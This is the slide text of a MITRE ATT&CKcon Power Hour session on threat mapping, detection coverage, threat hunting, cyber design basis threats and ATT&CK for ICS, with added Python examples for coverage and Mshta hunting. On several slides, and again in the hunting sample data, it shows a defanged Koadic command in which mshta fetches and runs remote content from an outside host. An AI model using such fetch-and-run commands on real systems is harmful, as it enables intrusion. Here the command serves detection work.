
MITRE ATTACKCon Power Hour - December

Presentation slides from the MITRE ATT&CKcon Power Hour session held on December 11, 2020.



  1. Welcome
  2. Join us on Slack
  3. Valentina Palacín: THREAT MAPPING CATALOGUE
  4. TABLE OF CONTENTS: 01 ABOUT ME, 02 INSPIRATION, 03 IDEA, 04 EXPECTATIONS, 05 REALITY, 06 FUTURE
  5. 01 ABOUT ME. Valentina Palacín @fierytermite
  6. VALENTINA PALACÍN @FIERYTERMITE. Translator. Threat Intelligence Analyst. Threat Hunter & Python Developer in progress.
  7. 02 INSPIRATION. How was the idea born?
  8. THREAT LIBRARY: a knowledge base for distilled and curated intelligence insights produced by CTI research teams & OSINT sources.
  9. HOW CAN I LEVERAGE SOMETHING LIKE THIS IF I DON'T HAVE A DEDICATED TEAM?
  10. 03 IDEA. Threat Mapping Catalogue
  11. WHAT IF…? TMC + ATT&CK
  12. 04 EXPECTATIONS. Capabilities
  13. MY WISHLIST ● Load DB with ATT&CK content ● Use TRAM to load new relationships ● Manually add adversary mappings ● Create more relationships (industries, dates, adversary types…) ● Explore relationships through GUI ● Edit selected data through GUI ● Edit relationships through GUI ● Export data to ATT&CK Navigator ● Dockerize everything for easy deployment
  14. But 2020…
  15. WHY DID I DO THIS TO MYSELF?
  16. 05 REALITY. Capabilities
  17. SO FAR… ● Load DB with ATT&CK content ● Use TRAM to load new relationships ● Manually add adversary mappings ● Create more relationships (industries, dates, adversary types…) ● Explore relationships through GUI ● Edit selected data through GUI ● Edit relationships through GUI ● Export data to ATT&CK Navigator ● Dockerize everything for easy deployment
  18. /first-time: git clone https://github.com/fierytermite/attack-navigator ; git clone --branch tmc https://github.com/fierytermite/tram-1 ; git clone https://github.com/intelforge/tmc * Register and log in with the new user
  19. FIRST…
  20. FIRST… 1.3H
  21. localhost:4200/fetch/http:%2F%2Flocalhost:5000%2Fstatic%2Fexport%2Fadversary_1_60ba8984-3b68-11eb-834e-080027bab013.json
  22. 06 FUTURE. Capabilities
  23. GOALS ● Create more relationships (dates, adversary types…) ● Manually load new mapping ● Edit relationships through UI ● Dockerize everything for easy deployment ● Add relational graphs to study the adversaries
  24. BUT FOR NOW…
  25. THANKS! Do you have any questions? @fierytermite linkedin.com/in/valentinapalacin. CREDITS: This presentation template was created by Slidesgo, including icons by Flaticon, and infographics & images by Freepik. Please keep this slide for attribution.
  26. From Theory to Practice: How My ATT&CK® Perspectives Have Changed. Katie Nickels, ATT&CKcon Power Hour, December 11, 2020
  27. Yes, this is being recorded. Yes, the slides will be shared. No, I don't know when. Soon.
  28. About Me: Katie Nickels, DIRECTOR OF INTELLIGENCE, RED CANARY, @LiketheCoins § Former MITRE ATT&CK Team Member (relevant) § SANS Certified Instructor for FOR578: Cyber Threat Intelligence § Bringing context about threats to inform decisions § Maintaining sanity with exercise, chocolate, containers, and holiday lights
  29. Different perspectives help you think differently
  30. How I've thought differently about ATT&CK: 1. Tracking tactics, techniques, and procedures 2. Defining detection coverage 3. Choosing what to detect
  31. Thinking through TTPs
  32. Tracking TTPs the MITRE way (https://attack.mitre.org/techniques/T1218/005/). Tactic: Defense Evasion. Technique/Sub-technique: Signed Binary Proxy Execution: Mshta. Procedure: Koadic can use MSHTA to serve additional payloads.[13]
  33. A Koadic detection at Red Canary. Procedure... So what's this?
  34. We want to track things beyond TTPs: Tactics, Techniques/Sub-techniques, Procedures, Observables
  35. Example of tracking beyond TTPs. Tactic: Defense Evasion/Execution. Technique: T1218.005 Signed Binary Proxy Execution: Mshta. Procedure: Koadic used VBScript to launch mshta.exe and make an external network connection. Observable: C:\Windows\system32\mshta.EXE vbscript:CreateObject("WScript.Shell").run("mshta hxxp[:]//8.8.8[.]8:123/12qwert",0)(window.close)
  36. Primary Tactic: Execution. Additional Tactics: TA0005 Defense Evasion. Techniques: T1218.005 Signed Binary Proxy Execution: Mshta; T1059.005 Command and Scripting Interpreter: Visual Basic. Procedure: Koadic uses VBScript to launch mshta.exe and make an external network connection. ★ Observable: C:\Windows\system32\mshta.EXE vbscript:CreateObject("WScript.Shell").run("mshta hxxp[:]//8.8.8[.]8:1234/1234656qwerty",0)(window.close). Detectors (Name / Targeted to this profile?): WIN-MSHTA-CLI-URL / No; WIN-MSHTA-NON-HTA / No; WIN-MSHTA-INLINE-VBSCRIPT / No
  37. What this format lets us do § Track detailed observables from endpoint telemetry § Identify where we have detection coverage (or not) § Use ATT&CK tactics, techniques, and sub-techniques ...but add on because it meets our needs
  38. Defining detection coverage
  39. Defining coverage by confidence. https://i.blackhat.com/USA-19/Wednesday/us-19-Nickels-MITRE-ATTACK-The-Play-At-Home-Edition.pdf
  40. The challenge of unlimited procedures: "You should also remember that each ATT&CK technique may have many procedures for how an adversary could implement it — and because adversaries are always changing, we can't know what all those procedures are in advance." https://medium.com/mitre-attack/how-to-be-a-savvy-attack-consumer-63e45b8e94c9
  41. Katie: "There are unlimited procedures!" § Matt: "But are there?" o Think of techniques like MSHTA o Commands only have so many flags § We may be able to scope some technique variations
  42. Defining detection coverage by variations
  43. Adding in variations: Tactics, Techniques/Sub-techniques, Variations, Procedures, Observables. Variations are specific options made available to an attacker as defined by the technical components involved that comprise a technique (working definition).
  44. Nine known variations for HTA: 1. HTA can have any file name and extension 2. Specifying a URI from where HTA content is first downloaded 3. Use of scripting engines 4. Specifying protocol handlers (e.g., "vbscript", "javascript", "about") 5. HTA content embedded and executed from within other file formats 6. HTA content can be executed remotely via UNC paths 7. Remote HTA execution via COM interface (lateral movement) 8. HTA execution by double clicking or invoking with "explorer.exe foo.hta" 9. Full control over the path and filename of mshta.exe and rundll32.exe. https://redcanary.com/blog/threat-research-questions
  45. Adding in variations. Tactic: Defense Evasion/Execution. Technique: T1218.005 Signed Binary Proxy Execution: Mshta. Variations: Specifying protocol handler + direct download from URI. Procedure: Koadic used VBScript to launch mshta.exe and make an external network connection. Observable: C:\Windows\system32\mshta.EXE vbscript:CreateObject("WScript.Shell").run("mshta hxxp[:]//8.8.8[.]8:123/12qwert",0)(window.close)
  46. Mix and match the variations: Specifying protocol handler (vbscript:); Direct download from URI (mshta hxxp[:]//8.8.8[.]8:123/); Specifying protocol handler (jscript:). https://github.com/redcanaryco/AtomicTestHarnesses/tree/master/TestHarnesses/T1218.005_Mshta
  47. Testing known variation combinations: T1218.005 Signed Binary Proxy Execution: Mshta. 25 tested combinations (more granular) vs. 1 technique (less granular)
  48. Defining detection coverage by threat observables
  49. Remember that profile breakdown? Techniques: T1218.005 Signed Binary Proxy Execution: Mshta; T1059.005 Command and Scripting Interpreter: Visual Basic. Observable: Koadic uses VBScript to launch mshta.exe and make an external network connection. C:\Windows\system32\mshta.EXE vbscript:CreateObject("WScript.Shell").run("mshta hxxp[:]//8.8.8[.]8:1234/1234656qwerty",0)(window.close). Detectors (Name / Targeted to this profile?): WIN-MSHTA-CLI-URL / No; WIN-MSHTA-NON-HTA / No; WIN-MSHTA-INLINE-VBSCRIPT / No
  50. Mapping coverage based on threats: T1218.005 Signed Binary Proxy Execution: Mshta. 6 threat observables for Mshta (more granular): Koadic observable 1, Koadic observable 2, FIN7 observable 1, FIN7 observable 2, Kovter observable 1, Lazarus observable 1. vs. 1 technique (less granular)
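An added example, not code from the talk or from Red Canary, of the profile format slides 36, 43 and 50 describe (tactics, techniques, variations, procedure/observable, detectors) and of expressing coverage at the three granularities those slides compare. Only the first Koadic observable and the three detector names come from the slides; the other five observables are constructed placeholders so the six-observable view on slide 50 can be computed.

```python
"""Threat-profile model and coverage at three granularities (added example)."""
from collections import defaultdict
from dataclasses import dataclass, field


@dataclass
class Observable:
    threat: str
    technique: str            # ATT&CK (sub-)technique id, e.g. T1218.005
    variations: tuple         # labels from the nine HTA variations on slide 44
    procedure: str
    command_line: str         # defanged, as on the slide, or a constructed placeholder
    detectors: dict = field(default_factory=dict)  # detector name -> targeted to this profile?


PROFILE = [
    Observable("Koadic", "T1218.005",
               ("Specifying protocol handlers", "Specifying a URI from where HTA content is first downloaded"),
               "Koadic uses VBScript to launch mshta.exe and make an external network connection",
               'C:\\Windows\\system32\\mshta.EXE vbscript:CreateObject("WScript.Shell")'
               '.run("mshta hxxp[:]//8.8.8[.]8:1234/1234656qwerty",0)(window.close)',
               {"WIN-MSHTA-CLI-URL": False, "WIN-MSHTA-NON-HTA": False, "WIN-MSHTA-INLINE-VBSCRIPT": False}),
    # constructed placeholders: threat names and counts follow slide 50, nothing else is from the talk
    Observable("Koadic", "T1218.005", ("Specifying protocol handlers",),
               "constructed", "<constructed>", {"WIN-MSHTA-INLINE-VBSCRIPT": False}),
    Observable("FIN7", "T1218.005", ("Specifying a URI from where HTA content is first downloaded",),
               "constructed", "<constructed>", {"WIN-MSHTA-CLI-URL": True}),
    Observable("FIN7", "T1218.005", ("HTA can have any file name and extension",),
               "constructed", "<constructed>", {"WIN-MSHTA-NON-HTA": True}),
    Observable("Kovter", "T1218.005", ("HTA content embedded and executed from within other file formats",),
               "constructed", "<constructed>", {}),
    Observable("Lazarus", "T1218.005", ("Use of scripting engines",),
               "constructed", "<constructed>", {"WIN-MSHTA-INLINE-VBSCRIPT": False}),
]


def is_covered(obs):
    """An observable counts as covered when at least one detector fires on it."""
    return bool(obs.detectors)


def coverage_by_technique(profile):
    """Least granular view (slide 50, right): share of observables covered per technique."""
    per_technique = defaultdict(list)
    for obs in profile:
        per_technique[obs.technique].append(is_covered(obs))
    return {t: sum(flags) / len(flags) for t, flags in per_technique.items()}


def coverage_by_variation(profile):
    """Middle granularity (slide 43): is each exercised variation covered by anything?"""
    per_variation = defaultdict(list)
    for obs in profile:
        for v in obs.variations:
            per_variation[v].append(is_covered(obs))
    return {v: any(flags) for v, flags in per_variation.items()}


def coverage_by_observable(profile):
    """Most granular view (slide 50, left): one row per threat observable, with
    whether anything covers it and whether a detector is targeted to this profile."""
    return [(obs.threat, obs.technique, is_covered(obs), any(obs.detectors.values()))
            for obs in profile]


def gaps(profile):
    """Observables with no detector at all: the first things to write analytics for."""
    return [obs for obs in profile if not is_covered(obs)]


if __name__ == "__main__":
    print("by technique:", coverage_by_technique(PROFILE))
    print("by variation:", coverage_by_variation(PROFILE))
    for row in coverage_by_observable(PROFILE):
        print("by observable:", row)
    print("gaps:", [(g.threat, g.variations) for g in gaps(PROFILE)])
```

The same six rows feed all three views: the technique view collapses them to one number, the variation view shows which of the nine HTA options nothing fires on, and the observable view is what slide 50 draws on the left.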
  51. So how should we explain detection coverage?
  52. Explaining to leadership: This is okay!
  53. Diving deeper: These are okay too! HTA test harness results; Mshta threat observables: Koadic observable 1, Koadic observable 2, FIN7 observable 1, FIN7 observable 2, Lazarus observable 1
  54. Expressing coverage is just tough § Any way you express it will have limitations § There's no "right" or "wrong" way to do it ...but there may be "better" ways for your needs § Figure out the requirement for what you're doing o What are you trying to convey and achieve? o What's your goal of expressing the coverage?
  55. Choosing what to detect
  56. Finding "good" detection opportunities § Not everything is useful for detection § Choosing is most of the battle. https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/
  57. Discovery techniques § "Discovery techniques aren't that useful for detection" https://i.blackhat.com/USA-19/Wednesday/us-19-Nickels-MITRE-ATTACK-The-Play-At-Home-Edition.pdf
  58. Domain Trust Discovery with nltest § "...except when they are"
  59. Testing & tuning is most of the work § "This should NEVER happen in an environment, let's write a detection analytic!" —Me in January 2020 § "Here's a hypothesis that will probably be noisy so here are five ways to tune it when that happens." —Me in December 2020 § If an analytic is noisy…how can we tune it? o Narrow it down? Use threat intelligence. o Easily suppress on false positives? https://redcanary.com/blog/tuning-detectors/
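An added example, not Red Canary's code and not any of the detectors named on the slides: a hunting analytic for two of the Mshta variations on slides 44 to 46 (protocol handler, direct download from a URI), run over constructed process telemetry, plus two of the tuning levers slide 59 raises, suppressing known-good parent processes and narrowing with threat intelligence. Hosts, paths and all events but the first are constructed; the first event reuses the Koadic command line from slide 35 in its defanged form.

```python
"""Mshta variation analytic with two tuning levers (added example)."""
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath

# protocol handlers from variation 4 on slide 44
HANDLER = re.compile(r"\b(vbscript|javascript|jscript|about):", re.I)
# variation 2: content fetched from a URI; accepts live (http://) and defanged (hxxp[:]//) forms
URI = re.compile(r"\bh(?:tt|xx)ps?\[?:\]?//", re.I)


@dataclass
class ProcessEvent:
    host: str
    parent_image: str
    image: str
    command_line: str


SAMPLE_EVENTS = [
    # the slide's Koadic observable, launched from a VBScript host as the procedure describes
    ProcessEvent("WS-0117", r"C:\Windows\System32\wscript.exe", r"C:\Windows\system32\mshta.EXE",
                 'C:\\Windows\\system32\\mshta.EXE vbscript:CreateObject("WScript.Shell")'
                 '.run("mshta hxxp[:]//8.8.8[.]8:123/12qwert",0)(window.close)'),
    # a user opening a local help file: no handler, no URI, should not fire
    ProcessEvent("WS-0042", r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
                 r'"C:\Windows\System32\mshta.exe" "C:\Program Files\ExampleVendor\help.hta"'),
    # a constructed vendor agent that legitimately uses a handler: the source of the noise
    ProcessEvent("WS-0042", r"C:\Program Files\ExampleVendor\agent.exe", r"C:\Windows\System32\mshta.exe",
                 "mshta.exe about:blank"),
    # not mshta at all
    ProcessEvent("SRV-0003", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\curl.exe",
                 "curl https://updates.example.invalid/manifest.json"),
]

# tuning lever 1: parents known to be benign in this environment (constructed)
SUPPRESSED_PARENTS = {r"c:\program files\examplevendor\agent.exe"}
# tuning lever 2: narrow with threat intelligence; pattern derived from the Koadic procedure on the slides
INTEL_PATTERNS = {"Koadic": re.compile(r'CreateObject\("WScript\.Shell"\)\.run\("mshta', re.I)}


def variations(event):
    """Return the Mshta variations an event exhibits; empty if the image is not mshta.exe."""
    if PureWindowsPath(event.image).name.lower() != "mshta.exe":
        return set()
    found = set()
    if HANDLER.search(event.command_line):
        found.add("protocol handler")
    if URI.search(event.command_line):
        found.add("direct download from URI")
    return found


def hunt(events, suppressed_parents=frozenset(), intel_patterns=None):
    """Run the analytic, drop suppressed parents, and label hits that match intel."""
    alerts = []
    for ev in events:
        hits = variations(ev)
        if not hits or ev.parent_image.lower() in suppressed_parents:
            continue
        attribution = [name for name, pat in (intel_patterns or {}).items()
                       if pat.search(ev.command_line)]
        alerts.append({
            "host": ev.host,
            "variations": sorted(hits),
            "attribution": attribution,
            # an intel match, or several variations stacked together, goes to the top of the queue
            "priority": "high" if attribution or len(hits) > 1 else "low",
        })
    return alerts


if __name__ == "__main__":
    print("untuned:", hunt(SAMPLE_EVENTS))
    print("tuned:  ", hunt(SAMPLE_EVENTS, SUPPRESSED_PARENTS, INTEL_PATTERNS))
```

Untuned, the analytic fires on both the Koadic event and the vendor agent; with the parent suppression in place only the Koadic event remains, and the intel pattern lifts it to high priority so the noisy hypothesis still surfaces the behaviour the profile describes.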
  60. In closing
  61. Takeaways § Don't limit yourself to just TTPs if you need to go further § Define detection coverage based on your requirements § Trial, error, and experience will help you choose what to detect § It's a good thing to change your perspectives § Surrounding yourself with new people and new situations lets you think differently and mature
  62. Thank you! Katie Nickels @RedCanary @LiketheCoins https://redcanary.com/blog/
  63. Sharpening your Threat Hunting Program with ATT&CK Framework. Hieu Tran, Detection Team Lead | FPT Cybersecurity Division
  64. INDEX: Sharpening your Threat Hunting Program with ATT&CK framework. 01 Threat Hunting vs Threat Detection; 02 Threat Hunting Methodology; 03 MITRE ATT&CK - Threat Hunter Common Language; 04 Case study; 05 Key takeaways; 06 Q&A
  65. Threat hunting: the human-driven (and tool-assisted) practice of searching iteratively through data to detect advanced threats that evade traditional security controls
  66. Threat Hunting vs Threat Detection. Threat Hunting: DEFINITION • Proactive • Humans find bad stuff with the help of machines. PROs • Identifies detection gaps and drives creation of new detections. CONs • Needs security experts for searching, hunting, etc. • Slow and expensive. Threat Detection: DEFINITION • Reactive • Automated with machines such as SIEM, IDS/IPS, AV, etc. PROs • Least expensive approach. CONs • Likely to miss something (false negatives) • Too much time spent because of alert fatigue (false positives)
  67. What are we looking for?
  68. NUMBERS TELL STORIES: GLOBAL DWELL TIME. It takes a long time to detect bad guys inside your organization. FireEye Mandiant M-Trends 2020 Special Report
  69. Threat Hunting Methodology 1. Target: Scope the data sets that will be used in your investigation. Hunts can branch from various starting points. 2. Hunt: Proactively and iteratively search through network and endpoint data to detect and isolate advanced threats that evade more traditional security solutions. 3. Disrupt: Seamlessly pivot from hunting to forensic analysis, in order to disrupt adversaries before they fully execute their attacks. These analyses can also generate new indicators that can be fed into complementary security systems, creating a valuable security feedback loop.
  70. MITRE ATT&CK - Threat Hunter Common Language
  71. Case Study: APT32. Threat Hunting and Incident Response against Cyber Espionage Threat Actors: APT32 (OceanLotus/SeaLotus/CobaltKitty). Our customer's situation: • Large enterprise with a huge number of endpoints: ~1000 servers, 6000 workstations. • Core services (Active Directory, email server, antivirus management) already compromised. • Operations and security staff machines were compromised. IT IS CHAOS
  72. https://twitter.com/ItsReallyNick/status/915800233455575040
  73. Case Study: APT32. Based on what we found on compromised servers/workstations, we built our hypothesis: • Gain initial access by using spear phishing to gather valid (administrator) accounts. • Execute malicious payloads with Living-off-the-Land Binary (LOLBIN) techniques. • Maintain persistence by installing a new service or registry run keys. • Stay under the radar (defense evasion) by software packing, DLL hijacking, file deletion…. • Discovery by network service scanning and brute forcing using custom malware/scripts. • C2 communication using commonly used ports (80, 443, 53)
  74. https://gist.githubusercontent.com/itsreallynick/2bd73f54d643fe4553d413e71b3893cc/raw/06c7c7012b17b890ffb8f5029d5f367c9a7122ee/pok%25C3%25A9.txt
  75. Case Study #1. We deployed independent hunting stacks: • Endpoint Detection & Response • Data lake (gathering all essential service logs, including DNS, proxy, AD…) • Advanced Threat Detection • Network Detection & Response. We automated a lot of work by leveraging the OpenAPI: • Quickly deploy data acquisition scripts across the enterprise infrastructure. • Prevent active C2 connections with endpoint isolation and binary isolation. • Speed up cleaning of malware artifacts (remove binary files, executable files and registry run keys).
  76. Case Study #1. At the end of the day, we discovered: • 13 C2 domains and 12 C2 IPs: • 04 C2 domains had never been seen before. • 26 servers and 96 clients were compromised. • 09 user SIDs were used to install malicious services. • Multiple malware artifacts, which could be divided into 03 groups: • Binary files (.exe and .dll files) • Scripts (PowerShell, C#, JScript, .NET) • Webshells (PHP scripts) • C2 payloads (found in the registry)
  77. We will be able to hunt at scale with: the right staff with the right skillsets; the right process/procedures for hunting; the right technical solutions that enable hunters
  78. Key Takeaways 1. Assume-breach mindset. 2. Train your staff in threat hunter skillsets (or outsource). 3. Build a roadmap for implementing solutions properly.
  79. THANK YOU. QUESTIONS? HieuTT35@fpt.com.vn Twitter: @HieuTra34558978
  80. USING ATT&CK TO CREATE CYBER DBTS. DR. JACOB BENJAMIN
  81. ABOUT THE PRESENTER: JACOB BENJAMIN, DIRECTOR OF PROFESSIONAL SERVICES. PREVIOUS ICS EXPERIENCE + Idaho National Laboratory + Areva NP + Duke Energy. RESEARCH AREAS + Nuclear Cybersecurity + Cyber Risk Management + Wireless Security + Software-Defined Networking + Malware Analysis + Steganography Detection. CREDENTIALS + Ph.D., Computer Science + M.S., Cybersecurity + B.S., Computer Science + CISSP
  82. DESIGN BASIS THREAT (DBT) OVERVIEW + What is a DBT? + How are they developed? + What does a DBT look like? + Are there cyber DBTs?
  83. IAEA DBT WORKSHOP EXAMPLE DBT: "ATTEMPT OF THEFT OF A SIGNIFICANT AMOUNT OF NUCLEAR MATERIAL (E.G. 10KG OF PU) BY A GROUP OF 6 OUTSIDERS EQUIPPED WITH 10 KG TNT EXPLOSIVE, AUTOMATIC WEAPONS (INCLUDING LIGHT INFANTRY WEAPONS) AND SPECIFIC COMMERCIALLY AVAILABLE INTRUSION TOOLS. THEY HAVE A COMPREHENSIVE KNOWLEDGE OF THE FACILITY AND ASSOCIATED PHYSICAL PROTECTION MEASURES. WILLING TO DIE OR TO KILL. NO COLLUSION WITH INSIDER."
  84. RESPONSE TIME VS ADVERSARY TASK TIME (timeline figure). Adversary task time runs from T0 (Adversary Begins Task) to Tc (Adversary Completes Task); sensing opportunities lie along it. First Sensing starts Detection Time, ending at TD (Adversary Detected); Response Force Time then runs to Ti (Adversary Interrupted). The PPS Response Time is compared with the Adversary Task Time Remaining After 1st Sensing and the Time Remaining After Interruption.
  85. CYBER SECURITY FOR NUCLEAR POWER PLANTS. KEY DOCUMENTS • NEI 04-04, Voluntary Cyber Program • 10 CFR 73.54, The Cyber Rule • NEI 08-09, Cyber Security Plan • NEI 13-10, Cyber Security Assessments. CHALLENGES • Describing the cyber threat landscape • Modeling cyber-initiated events • Mal-operation vs malware. USING ATT&CK • Describe threat behavior • Conduct adversary emulation • Evaluate actual events & case studies. Cybersecurity risk mitigation for nuclear power plants began in 2002 and 2003, when the NRC included cybersecurity requirements in the Physical Security and Design Basis Threat Orders.
  86. USING TRADITIONAL DBT ANALYSIS FOR CYBER. PAST CYBER EVENTS: Nuclear sector, Energy sector, ICS overall. CREDIBLE THREAT INTELLIGENCE: Dragos WorldView Bulletins, CISA / ICS-CERT, Vendors. SITE-SPECIFIC TARGETS: Crown Jewel Analysis, Consequence-based targeting
  87. EXAMPLE CYBER DBT DEVELOPMENT. Targets • SIS • Turbines • Generators. Past Events • CrashOverride • Trisis • Stuxnet. Threat Intel • WorldView • CISA • Vendors
  88. CYBER DBT RESULT: ATTEMPT TO CAUSE A LOSS OF SAFETY IMPACT. ADVERSARY HAS BEEN KNOWN TO USE DRIVE-BY COMPROMISE, EXTERNAL REMOTE SERVICES, VALID ACCOUNTS, SUPPLY CHAIN COMPROMISE, AND ICS-TAILORED MALWARE. THEY HAVE DESTRUCTIVE CAPABILITIES, UNDERSTAND PROCESS IMPLICATIONS, AND HAVE SPECIFIC KNOWLEDGE OF INDUSTRIAL CONTROL SYSTEMS. WILLING TO CAUSE PHYSICAL HARM OR KILL. NO COLLUSION WITH INSIDER.
  89. LEVERAGING CYBER DBTS: ASSESSING MITIGATION COVERAGE. Table (TTP | Name | Mitigations): T0822 | External Remote Services | M1042, M1035, M1032, M1030. T0859 | Valid Accounts | M1047, M1037, M1032, M1027, M1026, M1018. T0817 | Drive-by Compromise | M1021. T0862 | Supply Chain Compromise | M1049, M1016. S0013 | Trisis | M1049, M1035, M1040, M1038, M1030
  90. LEVERAGING CYBER DBTS: ASSESSING MITIGATION COVERAGE (ATT&CK NAME). M1032 Multi-factor Authentication: T859 Valid Accounts, T822 External Remote Services. M1049 Antivirus / Antimalware: S0013 Trisis, T862 Supply Chain Compromise. M1021 Restrict Web-Based Content: T817 Drive-by Compromise
  91. LEVERAGING CYBER DBTS: ASSESSING DETECTION COVERAGE. Scripting: PowerShell, AppleScript, Windows Command Shell, Unix Shell, Visual Basic, Python, JavaScript/JScript. Trisis [S0013]
  92. HOW TO CREATE A CYBER DBT (SUMMARY) • DIGEST THREAT INTELLIGENCE • WorldView, CISA, vendors, etc. • UNDERSTAND YOUR SYSTEMS • Crown Jewel Analysis • EVALUATE YOUR DEFENSES • Quantify your mitigation and detection coverage • FOCUS ON THREAT BEHAVIORS • Combine and correlate this information with a common lexicon (ATT&CK)
  93. WHY SHOULD YOU USE CYBER DBTS? (SUMMARY) • ASSESS EFFECTIVENESS OF DEFENSES • EVALUATE THREAT DETECTION COVERAGE • DEVELOP AND TEST IR PLAYBOOKS • TRAIN PERSONNEL • IDENTIFY 'BEYOND DESIGN' SCENARIOS
  94. JBENJAMIN@DRAGOS.COM
  95. ©2020 The MITRE Corporation. ALL RIGHTS RESERVED. Approved for public release. Distribution unlimited 20-00841-17. What's New with ATT&CK® for ICS? Otis Alexander https://attack.mitre.org/ics @ojalexander
  98. ATT&CK for ICS Mitigations (https://collaborate.mitre.org/attackics/index.php/Mitigations) • M0800-M0816 are new to ATT&CK for ICS • Each mitigation has mappings to IEC 62443 and NIST SP 800-53 • Mitigations target the following stakeholders: • Asset owner/operators • Integrators • Device vendors • Security vendors • There is a significant focus on protecting operational and management interfaces of embedded controllers
  99. STIX and Navigator Integration • As part of ATT&CK v8, we released ATT&CK for ICS in STIX: https://github.com/mitre/cti/tree/master/ics-attack • A new version of ATT&CK Navigator was released as well, where you can pick the ICS domain: https://mitre-attack.github.io/attack-navigator/
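An added example, not MITRE's or Dragos's code, tying slide 99 to slides 89 and 90: it builds a small STIX 2 bundle in the shape the ATT&CK for ICS release uses (attack-pattern, course-of-action and "mitigates" relationship objects), parses it back into a TTP-to-mitigation map, and assesses mitigation coverage against a set of mitigations an organisation has deployed. The relationships are the technique rows of the table on slide 89; the object ids are constructed (real bundles use UUIDs), and the external_references source_name value "mitre-ics-attack" is assumed to be the one the ICS bundle uses.

```python
"""STIX 'mitigates' relationships -> mitigation coverage (added example)."""
import json
from collections import defaultdict

SOURCE_NAME = "mitre-ics-attack"  # assumption: source_name used by the ICS bundle's external references

TECHNIQUES = {"T0822": "External Remote Services", "T0859": "Valid Accounts",
              "T0817": "Drive-by Compromise", "T0862": "Supply Chain Compromise"}
MITIGATIONS = {"M1032": "Multi-factor Authentication", "M1049": "Antivirus/Antimalware",
               "M1021": "Restrict Web-Based Content", "M1042": "Disable or Remove Feature or Program",
               "M1035": "Limit Access to Resource Over Network", "M1030": "Network Segmentation",
               "M1047": "Audit", "M1037": "Filter Network Traffic", "M1027": "Password Policies",
               "M1026": "Privileged Account Management", "M1018": "User Account Management",
               "M1016": "Vulnerability Scanning"}
SLIDE_89_TABLE = {"T0822": ["M1042", "M1035", "M1032", "M1030"],
                  "T0859": ["M1047", "M1037", "M1032", "M1027", "M1026", "M1018"],
                  "T0817": ["M1021"],
                  "T0862": ["M1049", "M1016"]}


def build_bundle():
    """Serialise the table as a STIX bundle (constructed ids, not real UUIDs)."""
    objects = []
    for tid, name in TECHNIQUES.items():
        objects.append({"type": "attack-pattern", "id": f"attack-pattern--{tid}", "name": name,
                        "external_references": [{"source_name": SOURCE_NAME, "external_id": tid}]})
    for mid, name in MITIGATIONS.items():
        objects.append({"type": "course-of-action", "id": f"course-of-action--{mid}", "name": name,
                        "external_references": [{"source_name": SOURCE_NAME, "external_id": mid}]})
    for tid, mids in SLIDE_89_TABLE.items():
        for mid in mids:
            objects.append({"type": "relationship", "id": f"relationship--{mid}-{tid}",
                            "relationship_type": "mitigates",
                            "source_ref": f"course-of-action--{mid}", "target_ref": f"attack-pattern--{tid}"})
    return json.dumps({"type": "bundle", "id": "bundle--constructed", "objects": objects})


def attack_id(obj):
    """Pull the ATT&CK id (T0822, M1032, ...) out of an object's external references."""
    for ref in obj.get("external_references", []):
        if ref.get("source_name") == SOURCE_NAME:
            return ref.get("external_id")
    return None


def ttp_to_mitigations(bundle_json):
    """Walk 'mitigates' relationships and return {technique id: set of mitigation ids}."""
    bundle = json.loads(bundle_json)
    by_id = {o["id"]: o for o in bundle["objects"]}
    mapping = defaultdict(set)
    for rel in bundle["objects"]:
        if rel.get("type") != "relationship" or rel.get("relationship_type") != "mitigates":
            continue
        if rel.get("revoked") or rel.get("x_mitre_deprecated"):
            continue  # real bundles keep retired objects; skip them
        coa, ap = by_id.get(rel["source_ref"]), by_id.get(rel["target_ref"])
        if coa and ap and attack_id(coa) and attack_id(ap):
            mapping[attack_id(ap)].add(attack_id(coa))
    return dict(mapping)


def mitigation_to_ttps(mapping):
    """Inverse view, as on slide 90: {mitigation id: set of technique ids it addresses}."""
    inverse = defaultdict(set)
    for tid, mids in mapping.items():
        for mid in mids:
            inverse[mid].add(tid)
    return dict(inverse)


def assess(mapping, implemented):
    """Per-TTP list of implemented mitigations, plus the TTPs nothing implemented addresses."""
    covered = {tid: sorted(mids & implemented) for tid, mids in mapping.items()}
    gaps = sorted(tid for tid, mids in covered.items() if not mids)
    return covered, gaps


def best_next_mitigation(mapping, implemented):
    """Greedy pick: the unimplemented mitigation that closes the most remaining gaps."""
    _, gaps = assess(mapping, implemented)
    candidates = set().union(*mapping.values()) - implemented
    scores = {mid: sum(1 for tid in gaps if mid in mapping[tid]) for mid in candidates}
    if not scores or max(scores.values()) == 0:
        return None
    return min(scores, key=lambda mid: (-scores[mid], mid))


if __name__ == "__main__":
    mapping = ttp_to_mitigations(build_bundle())
    implemented = {"M1032"}  # constructed: only multi-factor authentication deployed so far
    print(assess(mapping, implemented))
    print("deploy next:", best_next_mitigation(mapping, implemented))
```

Against the real release the same parser runs over the ics-attack bundle from the mitre/cti repository instead of build_bundle(); the coverage functions then answer the slide-89 question for whatever DBT technique list an assessment produces.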
  100. What's on the Horizon?
  101. Updates to Data Sources • Maintaining visibility into ICS networks is essential for quickly detecting and remediating cyber threats. • Understanding the various data sources that are available in ICS networks is key to this endeavor. Network traffic is a popular source of data in ICS networks, but there are other valuable sources of data that are often overlooked: • Embedded device logs • Application logs • Operational databases
  102. Data Sources. Configuration • Firmware version • System settings • Control logic • Parameters. Performance and Statistics • CPU, memory, disk, ethernet, etc. • Network connection information. Process Information • I/O values associated with tags • Alarms and faults (e.g., digital fault recorder) • Events (e.g., command execution) • Process quality (e.g., phasor measurement unit). Asset Management • Condition-based monitoring • Predictive maintenance • Work order system. Physical • Physical sensors (e.g., tamper detection)
  103. ICS Attacks Mapped to Enterprise • We're currently working on mapping the following ICS attacks: • Stuxnet • Ukraine 2015 • Industroyer • Triton • Adversaries do not respect theoretical boundaries (i.e., IT/ICS), so it is important to have a deep understanding of how IT platforms are leveraged to access and impact ICS.
  104. We Need Your Help! • How can we improve ATT&CK for ICS? • How are you currently using mitigations? • Do you have any opinions on our data source focus?
  105. attack@mitre.org @MITREattack Otis Alexander @ojalexander
  106. Join our next session on January 14. Register now! https://na.eventscloud.com/ATTACKcon-power-hour
